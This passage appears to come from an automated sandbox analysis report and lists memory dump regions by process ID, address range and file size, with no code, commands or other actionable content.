                                                                                    • memory/2920-228-0x0000000000270000-0x0000000000282000-memory.dmp
                                                                                      Filesize

                                                                                      72KB

                                                                                    • memory/2920-206-0x0000000000000000-mapping.dmp
                                                                                    • memory/2920-226-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                      Filesize

                                                                                      64KB

                                                                                    • memory/2924-210-0x0000000000000000-mapping.dmp
                                                                                    • memory/2940-304-0x0000000004A60000-0x0000000004A61000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/2940-305-0x0000000004A62000-0x0000000004A63000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/2944-231-0x0000000000000000-mapping.dmp
                                                                                    • memory/2960-174-0x0000000000000000-mapping.dmp
                                                                                    • memory/3004-140-0x0000000000000000-mapping.dmp
                                                                                    • memory/3024-245-0x0000000002670000-0x0000000002771000-memory.dmp
                                                                                      Filesize

                                                                                      1.0MB

                                                                                    • memory/3024-192-0x00000000FF7F246C-mapping.dmp
                                                                                    • memory/3024-196-0x00000000004A0000-0x0000000000510000-memory.dmp
                                                                                      Filesize

                                                                                      448KB

                                                                                    • memory/3048-193-0x0000000000000000-mapping.dmp
                                                                                    • memory/5296-260-0x0000000000000000-mapping.dmp
                                                                                    • memory/6944-296-0x0000000004932000-0x0000000004933000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/6944-295-0x0000000004930000-0x0000000004931000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/6968-262-0x0000000000000000-mapping.dmp
                                                                                    • memory/7880-302-0x00000000024C0000-0x000000000310A000-memory.dmp
                                                                                      Filesize

                                                                                      12.3MB

                                                                                    • memory/7880-303-0x00000000024C0000-0x000000000310A000-memory.dmp
                                                                                      Filesize

                                                                                      12.3MB

                                                                                    • memory/7904-314-0x0000000005320000-0x0000000005321000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/7908-288-0x00000000048C2000-0x00000000048C3000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/7908-287-0x00000000048C0000-0x00000000048C1000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/7968-301-0x0000000004892000-0x0000000004893000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/7968-300-0x0000000004890000-0x0000000004891000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/8048-293-0x0000000004930000-0x0000000004931000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/8048-294-0x0000000004932000-0x0000000004933000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/8072-299-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/8176-283-0x0000000004B10000-0x0000000004B11000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/8176-282-0x0000000000F40000-0x0000000000F41000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/8176-285-0x0000000004AD2000-0x0000000004AD3000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/8176-286-0x0000000002700000-0x0000000002701000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/8176-284-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
                                                                                      Filesize

                                                                                      4KB